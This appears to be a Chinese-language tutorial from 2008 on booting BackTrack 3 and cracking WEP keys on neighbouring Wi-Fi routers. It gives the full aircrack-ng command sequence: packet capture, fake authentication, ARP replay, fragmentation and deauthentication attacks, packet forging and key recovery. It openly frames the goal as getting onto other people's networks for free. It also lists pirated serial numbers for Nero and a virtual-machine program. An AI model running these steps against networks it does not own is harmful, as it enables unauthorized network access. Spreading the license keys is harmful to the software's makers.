bt3教程
一.BT3下载地址https://www.360docs.net/doc/6e18191988.html,.uoc.gr/mirrors/linux/backtrack/bt3-final.iso
光盘版 695M
USB版 784M 二:安装BT3方法一:采用U盘安装。方法二: 采用光驱启动
BT3下破解操作指南
将此文件制作成起动盘,请务必使用NERO刻录。 (光盘务必用好的。不要用0.9块
的,刻录速度选最低,并增加设置刻录完后的数据检验项目)MD5: f79cbfbcd25147df32f5f6dfa287c2d9
SHA1: 471f0e41931366517ea8bffe910fb09a815e42c7http://cesium.di.uminho.pt/pub/backtrack/bt3final_usb.iso
MD5: 5d27c768e9c2fef61bbc208c78dadf22
SHA1: 3aceedea0e8e70fff2e7f7a7f3039704014e980f
nero下载地址在最后一页首先格式化U盘为fat格式,然后复制bt压缩文件的两个文件夹boot和bt3到U盘根目
录下,打开boot文件夹,bootinst.bat
按任意键结束.开机选择U盘启动
此两种配置的电脑均有可能会出不能顺利进入BT3系统的现象。在此我们只能采用虚拟机起动进入。方法三:虚拟机起动此系统如果以上方法均不可顺利进入BT3,则你的本本可能是宽屏的。可能是ATI显卡的。
(虚拟机只适合外置网卡的破解,内置网卡不支持虚拟机。)
虚拟机下载地址在最后一页选择红色部份即可。刻录成映像文件。
重新起动时设置bios 为光驱启动。即可
以上步骤安装好后,请点击启动该虚拟机, 在最右边你可以看到CD-ROM一栏。
并确定完成
这里只是告诉你虚拟机中需要设置的部份,如果上面没有提到的话,你可以选择缺省设置。一路下一步直致安装完成。
点击CD-ROM 进行设置
此处的BT3文件为未解压的文
件,选择好BT3路径*.iso
启动虚拟机三:启动BT3后,会出现一个界面。会有很多的选择。我们选择默认的第一个。回车到最后,大约等待1分钟,视你电脑配置。root 回车
toor
回车xconf
回车startx 回车好了,现在你就可以安安心心的去破网了。。。。。
以上为安装方法,建议各位在使用破解前,均要使用本人提供的无线网络搜索软件 查看记住以下信息:
二。BT3操作指南 (以下所有的0均为数字0,不是字母O)
1.打开一个shll窗口 。如下图:
2.进入窗口后输入:ifconfig -a 查看网卡
当然也可以 在以下的第五步前输入airodump-ng wlan0
查看
在此我们输入如下:
2.路由AP的MAC地址。
一般为6 和 11.路由的名称
3.此路由的频段当然如果是默认进入系统就更好了。如果不是默认就要输入左边的命令
(进去后,不用管任何调置及选择的问题,只管回车即可)
就会提示输入用户名及密码
3.输入命令:ifconfig -a wlan0 up 加载网卡 (说明:此处的wlan0为上图出现的红色
标记里的,
网卡不一样,提示不一样。但只要按上图提示输入就可以了。)(有的是rausb0 有的是wifi0……)
4.输入命令: airmon-ng start wlan0 6 这里一般写为6,此6为频道。有的是1 但国内一般都是用6.如果6不成功,则改成1
5.开始抓包
airodump-ng --ivs -w 123 -c 6 wlan0
以上参数说明:
a.BSSID 下面所对应的是你要攻击破解的路由AP的MAC地址。(要抄下)
b.PWR 值 PWR值代表信号强度。值越高越好。一般高于30就可以很容易的破解。
此处优先选择值高者破解
c.DATA 数据包。 下面所对应的AP(路由)如果有数值(不为0)就说明有客户端。
有客户端者优先破解。为0者先放弃。当然如果在破解时,此值为0.也可以破解。只是时间会长点。
且成功率降低。
d.ESSID 此务必记住 ,此为AP(路由的名字)
e.以上请一一对应记好
f.请务必选择 cipher下为wep的破解。如是wap或非wep者则放弃
非wep者目前仍未有好的方法破解。
重一个shll窗口
6.接着输入:
aireplay-ng -1 0 -e tp-link -a 00:11:22:33:44:55 -h 00:99:88:77:66:55 wlan0
(注:路由名字 MAC地址一定要参照显示大小写。中间要加冒号,这样比较容易成功,当然也可以不加)
说明:
tp-link 要更改。此处务必更改为以上的 D
00:11:22:33:44:55 此处务必更改为以上的 A
00:99:88:77:66:55 此处务必更改为以上最初记录的自已的网卡的mac地址
7.开始攻击
aireplay-ng -5 -b 00:11:22:33:44:55 -h 00:99:88:77:66:55 wlan0
另一种破解法:(上接第六步)在此也可以尝试用aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b ap.mac -h my.mac wlan0这个命令,如果OK。可以看到data猛涨到20万时我们就可跳到最后一步直接破解。Aircrack-ng *.ivs
如果只是涨到1两万,是破解不了。所以只是告诉你有这一种方法。可以用在睡觉前。早上一起来就破
此-2模式及Aircrack-ng *.ivs 的用法说明
在此接第七步
如果正常的话,会提示:user this packet? 此时输入y回车就可以了。等一下就可以得到一个致关重要的*.xor文件
至关重要*.xor文件1先看上面.你确定你破解的AP是default,另外此AP的
ivs为最多时,你就可以在此输入1并回车.回车后您
就可以得到密码了.如果未得出.你也不用关此窗口,他会自动导入ivs文件,直到破解成功.
当data涨到20000时输入此命令
8.产生一个注入攻击包。输入命令:
packetforge-ng -0 -a 00:11:22:33:44:55 -h 00:99:88:77:66:55 -k 255.255.255.255 -l
255.255.255.255 之间的-l是小写的L 字母来的。不要输错。
*.xor文件。可以先输ls查看 此处建议用复制粘贴的方式 不会错
就是in后面的所有单词都要复制
此处如果提示:wrote packet to:myarp
就成功了。
9.输入命令:aireplay-ng -2 -r myarp -x 1024 wlan0
得到以下提示:
输入y回车。
开始攻击。
这时我们回到第一个窗口 。我们可以看到data涨得很快。可以说是疯涨
当上面的data涨到20000时,我们开始破解
重开一个shll窗口
10.输入破解命令
aircrack-ng -n 64 -b 00:11:22:33:44:55 *.ivs此处只需更改ap.mac就可以了或:aircrack-ng *.ivs其余照抄
*.ivs 的意思是破解所有后缀名为ivs的文件。
出现以上的密码时,你就可以自由自在的去蹭网了。
如果此命令不能成功破解时,请再等等。等data到30000时再破解。
备注: 破解中的问题点处理办法
1.在第6步如果遇虚拟连接不成功时,可以采用以下办法
a.去掉-e tp-link 参数 直接到-a 如果提示要求加-e tp-link,那就加上。加上还不
能连接。我们再去掉此-e tp-link就好了
b.多等等
c.移动电脑或天线的位置,增强信号。
d.输入iwconfig wlan0 rate 2M (M务必为大写。)再进行虚拟连接 (也就是第六步)
2.第7步攻击不成功
a.多等等。有时那个值要等到20000多才成功。视路由AP而定
b.改用-4参数。Aireplay-ng -4 -b 。。。。。。….
c.改用-3参数
aireplay-ng -3 -b ap.mac -h 合法客户端mac wlan0
这一步较长。因为需要等到注入的arp
注入成功后获得足够的ivs,直接用aircrack-ng *.ivs或*.cap破解
d.用-2交换模式注入。
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b ap.mac -h 合法客户端mac wlan0
注意-h 后跟合法的客户端的mac
红色线条部份就是合法客户端mac
注入成功后会获得足够的ivs .直接用aircrack-ng *.ivs或*.cap破解命令照抄
e.在输d步之前输入以下命令。
aireplay-ng -0 3 -a ap.mac -c 合法mac wlan0
f.如果睡觉前还未破解成功请以下命令。待到第二天早上时再用破解命令破解。
aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b ap.mac -h 合法客户端mac wlan0
如果没有合法mac你也可以用自已的mac破解。
最后退出此系统
输入reboot 重起
输入poweroff 关机
nero下载地址https://www.360docs.net/doc/6e18191988.html,/soft/3478.html
序列号:4K2K-0027-1105-E955-50MM-7E14-K180
虚拟机下载地址https://www.360docs.net/doc/6e18191988.html,/soft/9131.html
序列号:JHXUR-G0M88-GA44V-4MRN6
祝:
被折腾得开心
雨中人编制
2008/7/24